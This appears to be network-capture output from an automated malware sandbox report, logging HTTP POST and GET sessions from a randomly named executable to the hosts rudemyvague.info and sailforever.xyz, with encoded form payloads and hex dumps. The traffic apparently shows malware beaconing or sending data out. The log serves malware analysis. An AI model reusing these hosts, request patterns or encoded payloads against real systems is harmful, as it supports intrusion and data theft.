                                                                                                                          Oct 21, 2024 17:25:06.652417898 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 fa 74 e1 56 8f d1 1d f0 64 65 fc 08 b5 5c 92 37 5f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                          Data Ascii: SJYg`I x1te9]M.tVde\7_#[%}m-oMoef0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.64999252.13.151.179802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:08.637603045 CEST784OUTPOST /t7t4/ HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.rudemyvague.info
                                                                                                                          Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 77 67 62 47 49 4b 6d 4e 69 2f 37 44 67 2f 4f 6a 2f 56 38 43 39 49 64 50 56 51 31 51 37 49 35 70 6d 79 6d 5a 49 6e 63 72 4e 4f 51 4d 48 71 63 50 53 69 74 2b 44 32 67 64 2b 73 39 48 51 38 4e 72 36 31 39 72 70 2f 2b 51 6a 74 55 6e 46 56 68 38 75 75 64 66 33 42 2f 6c 34 30 31 30 52 4e 71 30 38 67 48 77 50 49 6c 69 52 53 78 30 34 42 79 79 73 6e 34 43 41 64 35 55 56 62 38 61 61 4f 46 4f 6f 47 6c 51 69 42 7a 4a 75 41 63 5a 48 34 37 6f 39 51 56 42 6d 46 65 51 43 34 63 73 48 42 6d 61 66 72 7a 66 42 71 39 35 43 48 4b 73 35 58 49 6f 52 46 74 76 39 78 76 44 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9vwgbGIKmNi/7Dg/Oj/V8C9IdPVQ1Q7I5pmymZIncrNOQMHqcPSit+D2gd+s9HQ8Nr619rp/+QjtUnFVh8uudf3B/l4010RNq08gHwPIliRSx04Byysn4CAd5UVb8aaOFOoGlQiBzJuAcZH47o9QVBmFeQC4csHBmafrzfBq95CHKs5XIoRFtv9xvDA==
                                                                                                                          Oct 21, 2024 17:25:09.193495035 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:09 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                          Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS$QV+/{[FA8i"Q{ml7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_Tg8]yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NPo86YIpvYpmi?.4/X.
                                                                                                                          Oct 21, 2024 17:25:09.193511009 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 fa 74 e1 56 8f d1 1d f0 64 65 fc 08 b5 5c 92 37 5f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                          Data Ascii: SJYg`I x1te9]M.tVde\7_#[%}m-oMoef0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.64999352.13.151.179802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:11.176045895 CEST1797OUTPOST /t7t4/ HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.rudemyvague.info
                                                                                                                          Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 32 34 62 61 71 43 6d 4f 41 58 37 41 67 2f 4f 34 2f 56 35 43 39 49 41 50 55 30 78 51 37 45 44 70 6a 32 6d 62 71 76 63 71 38 4f 51 5a 58 71 63 51 69 69 6f 6a 54 32 31 64 2b 64 30 48 51 73 4e 72 36 31 39 72 73 7a 2b 41 47 42 55 33 31 56 69 2f 75 75 72 62 33 42 44 6c 38 59 44 30 52 35 36 30 73 41 48 7a 75 34 6c 6c 69 36 78 38 34 42 77 31 73 6e 67 43 41 5a 6d 55 56 58 47 61 62 37 59 4f 76 6d 6c 54 30 51 71 4d 65 4d 6b 4b 6b 49 70 39 66 6c 32 43 6d 56 7a 5a 6b 38 59 6f 46 39 4f 62 4f 76 4f 63 6c 75 62 36 52 65 34 76 5a 6a 42 73 56 6f 41 6a 2b 59 55 59 75 54 53 42 66 6c 30 64 39 70 76 41 58 37 71 4b 41 2b 6c 30 41 6e 67 76 6d 67 77 7a 48 74 6c 51 46 53 4e 32 63 77 63 76 6a 54 51 31 69 45 30 54 76 4f 74 66 47 45 79 6b 54 6d 4c 66 44 58 47 4a 5a 37 4b 34 74 2f 57 72 44 73 79 44 57 44 2b 53 33 7a 57 63 7a 71 49 63 30 4b 4b 33 53 2f 77 48 65 6e 6e 50 64 31 32 42 67 61 41 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9v24baqCmOAX7Ag/O4/V5C9IAPU0xQ7EDpj2mbqvcq8OQZXqcQiiojT21d+d0HQsNr619rsz+AGBU31Vi/uurb3BDl8YD0R560sAHzu4lli6x84Bw1sngCAZmUVXGab7YOvmlT0QqMeMkKkIp9fl2CmVzZk8YoF9ObOvOclub6Re4vZjBsVoAj+YUYuTSBfl0d9pvAX7qKA+l0AngvmgwzHtlQFSN2cwcvjTQ1iE0TvOtfGEykTmLfDXGJZ7K4t/WrDsyDWD+S3zWczqIc0KK3S/wHennPd12BgaAJ6HS7nX/1OzagSOwyFWMw08ZVDuk7P43gX5+QmE0CDuxTPLC1vCAPs/rJdZ5kMVrGD4GLTXct0O/g0T6tMss/IB/wwe9V4n7LdyL3nQYllCPWaIgadLqaUHOph6NUmjX1Dz7t7ER/8zNh6dKUpOVfYS8HYYNvzpSwDOOo8oM0n13/KakYgD/l0QvtyicOUMKLd+4kUZQHxzSeKOHR+6s607H+ad038W5ee7hcyeY0qD06Kaqczn+nc4SnuoYLo2jTNZK/sQ/S7rdnW2eEmRp8J02Y4qUZzdk6vAWx947tmAw0YeH/qw1cCiF1mvbX2JH13go3aj43M0aqSRu9mURRKm7XeqzkkLVYZzOFeCIAsDi1xObS8hvhBC4KAYWpgD57GqX5XM9wWjP0MrgXgWomzI4X6SKS+xDJhxFdzevwEAhQCwWbgIHevMYgP+LBQDS6PANO6UTRD00r9eCEvcbvPdmequTBXagVG0EyDqyHj3LNO38rVUTJj+vayIUmfr8mIJnLvYlnRF5w/RW4ICqJG129wm+wX5XnN3CcrzDPoymEeQJsC1xTJ+3ySX9aQZQOPfB69JmmssBW0zTWHSP3Q5ugHrOxL7Z0IsvqYi2c/E9e4Nc6LDsnkroQI5ic5hVpJ1g1WCZ7wRthTOu+K9ozliyi3elSfNAAK [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:25:11.754978895 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:11 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c ed cf 7d ef 7c 67 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 37 68 b3 ae 46 91 64 eb 47 e7 68 29 85 e9 2d 69 c6 d3 b5 ff 41 71 9a 5e ee 6c 9a 3f 80 3f 9c e6 f7 97 ce 1f c7 59 0d 1f 0f ed a3 81 b5 1f 19 b8 37 3d a3 a8 d0 4b a9 32 1f bd 83 8a a9 86 6a 4b 3f 4a ec a6 88 c6 bf 13 25 0b c1 fc 42 a5 27 c7 9e e6 06 3c 9e 25 1e e2 d8 b0 7f 07 51 7e 7c 4a 62 10 06 14 31 32 27 42 f6 14 e4 40 4d 83 19 b5 62 46 5d 30 e3 56 cc b8 0b e6 bc 15 73 de 05 33 69 c5 4c ba 60 a6 ad 98 69 17 cc ac 15 33 eb 82 b9 68 c5 5c 74 c1 cc 5b 31 f3 2e 98 e1 a0 bd fe 06 5d 40 2f 30 75 07 90 58 96 a0 ea 05 0f 52 c0 0f 6c 05 5c e6 1c 65 54 25 5c f4 90 83 5d 52 b7 c9 c1 de 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                          Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}|g++,tMMR0)v:y7hFdGh)-iAq^l??Y7=K2jK?J%B'<%Q~|Jb12'B@MbF]0Vs3iL`i3h\t[1.]@/0uXRl\eT%\]RXRFeNcn?gf/N%q4]__UE^Xa.CJ<~sD5KAjpIV?WNZy|M*/I)I%'?tFJYfsqJrC'}xI<U[koH"RqB~"#Pf.a_Tkg8]1yXx%B1_m=-2S\3Q!n\pK"(| ,z)~]>o|.l<$lbUa"qII\"h_z]
                                                                                                                          Oct 21, 2024 17:25:11.755026102 CEST106INData Raw: 92 a7 34 86 95 4c 19 a8 85 fb b3 f2 77 55 cf 28 c0 94 2a 40 66 33 72 09 f1 c2 67 11 2f 7c e8 22 ca f8 b3 97 9b 7d 0a 5e 05 8f a7 2c 9a 90 5d 52 95 e9 c2 ad de a2 3b e0 c9 ca f8 11 6a b9 24 6f 3e 46 36 b6 ea 48 76 e5 17 78 fb 3c 34 66 0f 2b da 9e
                                                                                                                          Data Ascii: 4LwU(*@f3rg/|"}^,]R;j$o>F6Hvx<4f+g+vq+e0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.64999452.13.151.179802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:13.720053911 CEST499OUTGET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:25:14.287341118 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:14 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Data Raw: 37 36 35 0d 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 70 70 72 65 73 73 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 73 74 79 6c 65 3e 0a 0a 62 6f 64 79 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 7d 0a 0a 68 31 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 62 67 31 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 31 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 32 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 32 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 33 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 [TRUNCATED]
                                                                                                                          Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
                                                                                                                          Oct 21, 2024 17:25:14.287419081 CEST1210INData Raw: 6d 67 2f 66 6f 6e 64 38 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 39 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 39 2e 77 65
                                                                                                                          Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.649995103.106.67.112802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:27.875425100 CEST757OUTPOST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 49 57 37 6f 31 6c 46 39 77 7a 79 7a 69 58 68 61 65 46 61 67 63 4c 4b 30 71 6b 2b 61 54 39 6a 68 38 46 2b 70 39 36 59 4d 6c 72 74 57 74 68 6d 78 32 46 46 5a 74 43 71 36 34 49 6f 56 42 4e 2b 32 44 62 72 6c 71 4e 38 62 6c 49 6f 31 71 68 4c 56 2b 58 47 76 31 4b 47 58 47 75 41 5a 61 6c 6b 4e 2b 31 52 77 51 6a 7a 35 54 6b 4b 44 78 4d 4d 62 6f 53 47 45 50 7a 52 46 35 4d 35 4b 4e 38 48 76 65 34 58 37 44 4d 66 76 51 7a 46 48 6c 61 31 75 33 56 43 69 73 39 72 6d 35 79 76 6f 77 6b 61 77 74 45 39 4c 6c 46 66 32 78 31 4f 62 71 57 54 4f 43 72 34 30 79 70 57 45 34 6f 54 42 75 66 6d
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCis9rm5yvowkawtE9LlFf2x1ObqWTOCr40ypWE4oTBufm
                                                                                                                          Oct 21, 2024 17:25:28.708517075 CEST245INHTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:28 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.649998103.106.67.112802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:30.426186085 CEST781OUTPOST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 70 6a 68 63 56 2b 71 38 36 59 43 46 72 74 43 39 68 5a 2b 57 46 43 5a 74 48 66 36 34 45 6f 56 42 5a 2b 32 42 44 72 6c 64 35 6a 4a 46 49 71 2b 4b 68 56 52 2b 58 47 76 31 4b 47 58 47 72 72 5a 65 78 6b 4e 4e 74 52 78 30 33 77 7a 7a 6b 46 45 78 4d 4d 52 49 53 43 45 50 7a 7a 46 39 4d 54 4b 50 30 48 76 65 49 58 37 53 4d 59 36 41 7a 66 4b 46 61 67 68 6e 45 30 74 75 31 76 6b 4a 79 39 39 58 34 42 78 62 46 6e 58 57 46 38 6b 68 56 4d 62 6f 4f 68 4f 69 72 53 32 79 52 57 57 76 6b 30 4f 61 36 46 4e 41 70 76 46 65 39 79 67 56 53 36 50 37 52 4e 53 33 63 42 67 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahpjhcV+q86YCFrtC9hZ+WFCZtHf64EoVBZ+2BDrld5jJFIq+KhVR+XGv1KGXGrrZexkNNtRx03wzzkFExMMRISCEPzzF9MTKP0HveIX7SMY6AzfKFaghnE0tu1vkJy99X4BxbFnXWF8khVMboOhOirS2yRWWvk0Oa6FNApvFe9ygVS6P7RNS3cBgA==
                                                                                                                          Oct 21, 2024 17:25:31.017003059 CEST245INHTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:30 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.649999103.106.67.112802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:32.973068953 CEST1794OUTPOST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 78 6a 68 75 74 2b 6f 65 53 59 44 46 72 74 65 4e 68 59 2b 57 46 54 5a 74 2f 54 36 34 34 43 56 46 70 2b 33 69 4c 72 6a 76 52 6a 43 46 49 71 6a 61 68 49 56 2b 58 54 76 31 36 43 58 46 44 72 5a 65 78 6b 4e 4c 70 52 68 51 6a 77 31 7a 6b 4b 44 78 4d 49 62 6f 53 71 45 4f 62 4a 46 39 41 70 4b 2b 55 48 73 36 73 58 33 45 77 59 6e 77 7a 5a 4c 46 62 6c 68 6e 49 6e 74 71 73 55 6b 4b 75 58 39 51 51 42 38 75 49 37 47 58 74 2f 33 79 4e 58 43 65 61 58 57 79 61 74 76 42 4e 76 59 64 6b 66 47 49 7a 73 4a 46 35 77 46 2b 6f 51 67 33 53 4c 4f 4e 5a 62 63 32 70 74 69 58 2b 6c 74 7a 39 79 4c 6f 68 49 31 78 61 57 57 5a 4a 67 51 39 59 47 72 6c 4b 4d 6a 5a 31 62 62 51 6b 2b 67 48 57 47 55 32 47 6f 51 59 32 46 58 45 44 4b 63 57 33 70 73 79 50 6b 4e 68 62 7a 51 6f 4a 77 54 74 2b 4a 5a 31 52 59 63 57 5a 62 4f 42 47 70 63 77 74 6a 61 68 59 6a 74 54 67 72 2b 6f 31 42 50 31 46 46 76 5a 67 34 [TRUNCATED]
